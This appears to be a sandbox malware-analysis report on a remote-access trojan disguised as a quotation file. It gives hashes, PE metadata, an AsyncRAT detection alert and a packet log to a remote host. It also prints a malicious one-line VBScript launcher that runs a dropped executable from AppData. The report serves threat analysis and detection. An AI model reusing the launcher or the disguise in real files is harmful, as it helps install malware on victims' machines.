MD5:	C9008FB779036D6A5F9AEB0FDABDBF77
SHA1:	AFEB772A91DE2514BDC13EF3D263424AF8951703
SHA-256:	F692738A7C4B5460FB1C558C2C323F4256920885529728B37BCF199655ACCDC8
SHA-512:	5C0A3F45A35931BA6C5B0EC15A6C6AA6A628D1CC2235AA5D763520972AFBE4CC6026B328F822B170696DD8739FBEB4B2F9A4023D539255C9593BA7A3481BC850
Malicious:	true
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Count.exe"""

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.481702907597321
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	RFQ-12202431_ACD_Group.pif.exe
File size:	25'600 bytes
MD5:	07a7551da7299874afd2c3e299eca83a
SHA1:	250884b7f1c7b152ca82f663d2e91986cec83db5
SHA256:	579054d208bdfde13c82c6c998e981f0559f69908a1ebc34249c2657a5d1c59d
SHA512:	4d737e13a950b27356c086751d293731dd5b9400fd1c32f6649391cd6c4b4b8fec1b7b2ddd90b1f185c3ffb06cacb74821324721ff44ca4534612fdc1899aef9
SSDEEP:	384:bTrwOQnF8OrQ96Y8SvNRWrOeY98CfRPdVUvMrELDw+YjzUZ+9q6VDejz8Tu:bfwpn69b8ARW+9jMzZiDFejYa
TLSH:	11B23A24A3ED4322DBFD5BB96CB1558457F3FA057CA2EB8E0D8C60961D43B805E1136B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....vg.................Z..........ny... ........@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40796e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6776D815 [Thu Jan 2 18:16:53 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7914	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8000	0x576	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x5974	0x5a00	09abe16be7b1b542d8b86017edbbc681	False	0.4894965277777778	data	5.669412532977577	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8000	0x576	0x600	992779741655bdc9e56201db6ab80acc	False	0.4075520833333333	data	3.9829735486891544	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa000	0xc	0x200	f4394cc51612caf875db9f4c5cb9b407	False	0.044921875	data	0.07763316234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x80a0	0x2ec	data			0.43716577540106955
RT_MANIFEST	0x838c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-03T02:01:19.076542+0100	2035595	ET MALWARE Generic AsyncRAT Style SSL Cert	1	193.187.91.218	50787	192.168.11.20	49775	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 02:00:59.155584097 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:00:59.155606031 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:00:59.155728102 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:00:59.167229891 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:00:59.167241096 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:00:59.490473986 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:00:59.490736961 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:00:59.495559931 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:00:59.495569944 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:00:59.495830059 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:00:59.526034117 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:00:59.566207886 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:00:59.798965931 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:00:59.798983097 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:00:59.799015999 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:00:59.799089909 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:00:59.799107075 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:00:59.799318075 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:00:59.953938961 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:00:59.954305887 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:00:59.954637051 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:00:59.954797029 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:00:59.954974890 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:00:59.955446959 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:00:59.955667019 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:00:59.993391037 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:00:59.993616104 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.110052109 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.110277891 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.110373974 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.111016035 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.111162901 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.111310005 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.112368107 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.112831116 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.113042116 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.113256931 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.113766909 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.114007950 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.148876905 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.149230957 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.149604082 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.149893999 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.265815020 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.266020060 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.266959906 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.267304897 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.267533064 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.267890930 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.268237114 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.268539906 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.268965960 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.269210100 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.269778967 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.270140886 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.270515919 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.270766973 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.271181107 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.271401882 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.272041082 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.272366047 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.272737026 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.273008108 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.273077011 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.273374081 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.273653984 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.305121899 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.305296898 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.305411100 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.305886984 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.306140900 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.306586981 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.306936026 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.421678066 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.422017097 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.422472000 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.422704935 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.422830105 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.423183918 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.423507929 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.423830986 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.424105883 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.424544096 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.424823999 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.425415039 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.425707102 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.426075935 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.426290989 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.426419973 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.426789045 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.427136898 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.427603960 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.427953959 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.428301096 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.428589106 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.429001093 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.429241896 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.429395914 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.429694891 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.429857016 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.429857016 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.429994106 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.430553913 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.430694103 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.430785894 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.431202888 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.431540012 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.431915045 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.432265997 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.432648897 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.432882071 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.433423996 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.433615923 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.433727026 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.434132099 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.434324026 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.434324980 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.434843063 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.435091019 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.435647011 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.435802937 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.435997963 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.436369896 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.436625004 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.436672926 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.437074900 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.437319040 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.460316896 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.460635900 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.461240053 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.461457014 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.461961985 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.462119102 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.462352991 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.462687016 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.462821007 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.462918997 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.463466883 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.463723898 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.576675892 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.576859951 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.577018976 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.577445030 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.577585936 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.577665091 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.578108072 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.578279018 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.578447104 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.578931093 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.579070091 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.579170942 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.579623938 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.579807997 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.579860926 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.579956055 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.580328941 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.580564022 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.581145048 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.581372023 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.581551075 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.581851959 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.582098961 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.582595110 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.582748890 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.582994938 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.583251953 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.583436966 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.583491087 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.584074974 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.584209919 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.584355116 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.584800959 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.584956884 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.585050106 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.585474014 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.585628033 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.585731983 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.586332083 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.586584091 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.586664915 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.587007046 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.587244034 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.587728977 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.587905884 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.588082075 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.588397980 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.588532925 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.588699102 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.589225054 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.589405060 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.589466095 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.589920044 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.590068102 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.590275049 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.590626955 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.590898991 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.591447115 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.591681957 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.591753960 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.592185020 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.592468023 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.592852116 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.593035936 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.593158007 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.593594074 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.593774080 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.593892097 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.594384909 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.594587088 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.594630003 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.595062017 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.595246077 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.595379114 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.595813036 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.595953941 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.596084118 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.596463919 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.596705914 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.597307920 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.597491026 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.597697020 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.598000050 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.598160982 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.598241091 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.598694086 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.598826885 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.598917007 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.599510908 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.599726915 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.599865913 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.600224972 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.600579977 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.600960970 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.601201057 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.601325989 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.601624012 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.601867914 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.602446079 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.602627993 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.602785110 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.603180885 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.603431940 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.603836060 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.604190111 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.604664087 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.604887009 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.605057001 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.605364084 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.605683088 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.606057882 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.606290102 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.606365919 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.606782913 CET	443	49774	209.58.149.225	192.168.11.20
